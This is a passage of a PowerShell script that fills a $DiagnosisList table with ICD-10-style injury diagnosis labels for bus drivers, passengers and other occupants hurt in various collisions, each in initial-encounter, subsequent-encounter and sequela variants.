$DiagnosisList.Rows.Add("Passenger on bus injured in collision with pedestrian or animal in traffic accident","Passenger on bus injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with pedestrian or animal in traffic accident","Person on outside of bus injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with pedestrian or animal in traffic accident","Person on outside of bus injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with pedestrian or animal in traffic accident","Person on outside of bus injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with pedestrian or animal in traffic accident","Unspecified occupant of bus injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with pedestrian or animal in traffic accident","Unspecified occupant of bus injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with pedestrian or animal in traffic accident","Unspecified occupant of bus injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with pedal cycle in nontraffic accident","Driver of bus injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with pedal cycle in nontraffic accident","Driver of bus injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with pedal cycle in nontraffic accident","Driver of bus injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with pedal cycle in nontraffic accident","Passenger on bus injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with pedal cycle in nontraffic accident","Passenger on bus injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with pedal cycle in nontraffic accident","Passenger on bus injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with pedal cycle in nontraffic accident","Person on outside of bus injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with pedal cycle in nontraffic accident","Person on outside of bus injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with pedal cycle in nontraffic accident","Person on outside of bus injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with pedal cycle in nontraffic accident","Unspecified occupant of bus injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with pedal cycle in nontraffic accident","Unspecified occupant of bus injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with pedal cycle in nontraffic accident","Unspecified occupant of bus injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with pedal cycle","Person boarding or alighting from bus injured in collision with pedal cycle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with pedal cycle","Person boarding or alighting from bus injured in collision with pedal cycle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with pedal cycle","Person boarding or alighting from bus injured in collision with pedal cycle, sequela") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with pedal cycle in traffic accident","Driver of bus injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with pedal cycle in traffic accident","Driver of bus injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with pedal cycle in traffic accident","Driver of bus injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with pedal cycle in traffic accident","Passenger on bus injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with pedal cycle in traffic accident","Passenger on bus injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with pedal cycle in traffic accident","Passenger on bus injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with pedal cycle in traffic accident","Person on outside of bus injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with pedal cycle in traffic accident","Person on outside of bus injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with pedal cycle in traffic accident","Person on outside of bus injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with pedal cycle in traffic accident","Unspecified occupant of bus injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with pedal cycle in traffic accident","Unspecified occupant of bus injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with pedal cycle in traffic accident","Unspecified occupant of bus injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Driver of bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Driver of bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Driver of bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Passenger on bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Passenger on bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Passenger on bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Person on outside of bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Person on outside of bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Person on outside of bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Unspecified occupant of bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Unspecified occupant of bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Unspecified occupant of bus injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with two- or three-wheeled motor vehicle","Person boarding or alighting from bus injured in collision with two- or three-wheeled motor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with two- or three-wheeled motor vehicle","Person boarding or alighting from bus injured in collision with two- or three-wheeled motor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with two- or three-wheeled motor vehicle","Person boarding or alighting from bus injured in collision with two- or three-wheeled motor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with two- or three-wheeled motor vehicle in traffic accident","Driver of bus injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with two- or three-wheeled motor vehicle in traffic accident","Driver of bus injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with two- or three-wheeled motor vehicle in traffic accident","Driver of bus injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with two- or three-wheeled motor vehicle in traffic accident","Passenger on bus injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with two- or three-wheeled motor vehicle in traffic accident","Passenger on bus injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with two- or three-wheeled motor vehicle in traffic accident","Passenger on bus injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with two- or three-wheeled motor vehicle in traffic accident","Person on outside of bus injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with two- or three-wheeled motor vehicle in traffic accident","Person on outside of bus injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with two- or three-wheeled motor vehicle in traffic accident","Person on outside of bus injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with two- or three-wheeled motor vehicle in traffic accident","Unspecified occupant of bus injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with two- or three-wheeled motor vehicle in traffic accident","Unspecified occupant of bus injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with two- or three-wheeled motor vehicle in traffic accident","Unspecified occupant of bus injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with car, pick-up truck or van in nontraffic accident","Driver of bus injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with car, pick-up truck or van in nontraffic accident","Driver of bus injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with car, pick-up truck or van in nontraffic accident","Driver of bus injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with car, pick-up truck or van in nontraffic accident","Passenger on bus injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with car, pick-up truck or van in nontraffic accident","Passenger on bus injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with car, pick-up truck or van in nontraffic accident","Passenger on bus injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with car, pick-up truck or van in nontraffic accident","Person on outside of bus injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with car, pick-up truck or van in nontraffic accident","Person on outside of bus injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with car, pick-up truck or van in nontraffic accident","Person on outside of bus injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with car, pick-up truck or van in nontraffic accident","Unspecified occupant of bus injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with car, pick-up truck or van in nontraffic accident","Unspecified occupant of bus injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with car, pick-up truck or van in nontraffic accident","Unspecified occupant of bus injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with car, pick-up truck or van","Person boarding or alighting from bus injured in collision with car, pick-up truck or van, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with car, pick-up truck or van","Person boarding or alighting from bus injured in collision with car, pick-up truck or van, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with car, pick-up truck or van","Person boarding or alighting from bus injured in collision with car, pick-up truck or van, sequela") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with car, pick-up truck or van in traffic accident","Driver of bus injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with car, pick-up truck or van in traffic accident","Driver of bus injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with car, pick-up truck or van in traffic accident","Driver of bus injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with car, pick-up truck or van in traffic accident","Passenger on bus injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with car, pick-up truck or van in traffic accident","Passenger on bus injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with car, pick-up truck or van in traffic accident","Passenger on bus injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with car, pick-up truck or van in traffic accident","Person on outside of bus injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with car, pick-up truck or van in traffic accident","Person on outside of bus injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with car, pick-up truck or van in traffic accident","Person on outside of bus injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with car, pick-up truck or van in traffic accident","Unspecified occupant of bus injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with car, pick-up truck or van in traffic accident","Unspecified occupant of bus injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with car, pick-up truck or van in traffic accident","Unspecified occupant of bus injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with heavy transport vehicle or bus in nontraffic accident","Driver of bus injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with heavy transport vehicle or bus in nontraffic accident","Driver of bus injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with heavy transport vehicle or bus in nontraffic accident","Driver of bus injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with heavy transport vehicle or bus in nontraffic accident","Passenger on bus injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with heavy transport vehicle or bus in nontraffic accident","Passenger on bus injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with heavy transport vehicle or bus in nontraffic accident","Passenger on bus injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with heavy transport vehicle or bus in nontraffic accident","Person on outside of bus injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with heavy transport vehicle or bus in nontraffic accident","Person on outside of bus injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with heavy transport vehicle or bus in nontraffic accident","Person on outside of bus injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with heavy transport vehicle or bus in nontraffic accident","Unspecified occupant of bus injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with heavy transport vehicle or bus in nontraffic accident","Unspecified occupant of bus injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with heavy transport vehicle or bus in nontraffic accident","Unspecified occupant of bus injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with heavy transport vehicle or bus","Person boarding or alighting from bus injured in collision with heavy transport vehicle or bus, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with heavy transport vehicle or bus","Person boarding or alighting from bus injured in collision with heavy transport vehicle or bus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with heavy transport vehicle or bus","Person boarding or alighting from bus injured in collision with heavy transport vehicle or bus, sequela") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with heavy transport vehicle or bus in traffic accident","Driver of bus injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with heavy transport vehicle or bus in traffic accident","Driver of bus injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with heavy transport vehicle or bus in traffic accident","Driver of bus injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with heavy transport vehicle or bus in traffic accident","Passenger on bus injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with heavy transport vehicle or bus in traffic accident","Passenger on bus injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with heavy transport vehicle or bus in traffic accident","Passenger on bus injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with heavy transport vehicle or bus in traffic accident","Person on outside of bus injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with heavy transport vehicle or bus in traffic accident","Person on outside of bus injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with heavy transport vehicle or bus in traffic accident","Person on outside of bus injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with heavy transport vehicle or bus in traffic accident","Unspecified occupant of bus injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with heavy transport vehicle or bus in traffic accident","Unspecified occupant of bus injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with heavy transport vehicle or bus in traffic accident","Unspecified occupant of bus injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with railway train or railway vehicle in nontraffic accident","Driver of bus injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with railway train or railway vehicle in nontraffic accident","Driver of bus injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with railway train or railway vehicle in nontraffic accident","Driver of bus injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with railway train or railway vehicle in nontraffic accident","Passenger on bus injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with railway train or railway vehicle in nontraffic accident","Passenger on bus injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with railway train or railway vehicle in nontraffic accident","Passenger on bus injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with railway train or railway vehicle in nontraffic accident","Person on outside of bus injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with railway train or railway vehicle in nontraffic accident","Person on outside of bus injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with railway train or railway vehicle in nontraffic accident","Person on outside of bus injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with railway train or railway vehicle in nontraffic accident","Unspecified occupant of bus injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with railway train or railway vehicle in nontraffic accident","Unspecified occupant of bus injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with railway train or railway vehicle in nontraffic accident","Unspecified occupant of bus injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with railway train or railway vehicle","Person boarding or alighting from bus injured in collision with railway train or railway vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with railway train or railway vehicle","Person boarding or alighting from bus injured in collision with railway train or railway vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with railway train or railway vehicle","Person boarding or alighting from bus injured in collision with railway train or railway vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with railway train or railway vehicle in traffic accident","Driver of bus injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with railway train or railway vehicle in traffic accident","Driver of bus injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with railway train or railway vehicle in traffic accident","Driver of bus injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with railway train or railway vehicle in traffic accident","Passenger on bus injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with railway train or railway vehicle in traffic accident","Passenger on bus injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with railway train or railway vehicle in traffic accident","Passenger on bus injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with railway train or railway vehicle in traffic accident","Person on outside of bus injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with railway train or railway vehicle in traffic accident","Person on outside of bus injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with railway train or railway vehicle in traffic accident","Person on outside of bus injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with railway train or railway vehicle in traffic accident","Unspecified occupant of bus injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with railway train or railway vehicle in traffic accident","Unspecified occupant of bus injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with railway train or railway vehicle in traffic accident","Unspecified occupant of bus injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with other nonmotor vehicle in nontraffic accident","Driver of bus injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with other nonmotor vehicle in nontraffic accident","Driver of bus injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with other nonmotor vehicle in nontraffic accident","Driver of bus injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with other nonmotor vehicle in nontraffic accident","Passenger on bus injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with other nonmotor vehicle in nontraffic accident","Passenger on bus injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with other nonmotor vehicle in nontraffic accident","Passenger on bus injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with other nonmotor vehicle in nontraffic accident","Person on outside of bus injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with other nonmotor vehicle in nontraffic accident","Person on outside of bus injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with other nonmotor vehicle in nontraffic accident","Person on outside of bus injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with other nonmotor vehicle in nontraffic accident","Unspecified occupant of bus injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with other nonmotor vehicle in nontraffic accident","Unspecified occupant of bus injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with other nonmotor vehicle in nontraffic accident","Unspecified occupant of bus injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with other nonmotor vehicle","Person boarding or alighting from bus injured in collision with other nonmotor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with other nonmotor vehicle","Person boarding or alighting from bus injured in collision with other nonmotor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with other nonmotor vehicle","Person boarding or alighting from bus injured in collision with other nonmotor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with other nonmotor vehicle in traffic accident","Driver of bus injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with other nonmotor vehicle in traffic accident","Driver of bus injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with other nonmotor vehicle in traffic accident","Driver of bus injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with other nonmotor vehicle in traffic accident","Passenger on bus injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with other nonmotor vehicle in traffic accident","Passenger on bus injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with other nonmotor vehicle in traffic accident","Passenger on bus injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with other nonmotor vehicle in traffic accident","Person on outside of bus injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with other nonmotor vehicle in traffic accident","Person on outside of bus injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with other nonmotor vehicle in traffic accident","Person on outside of bus injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with other nonmotor vehicle in 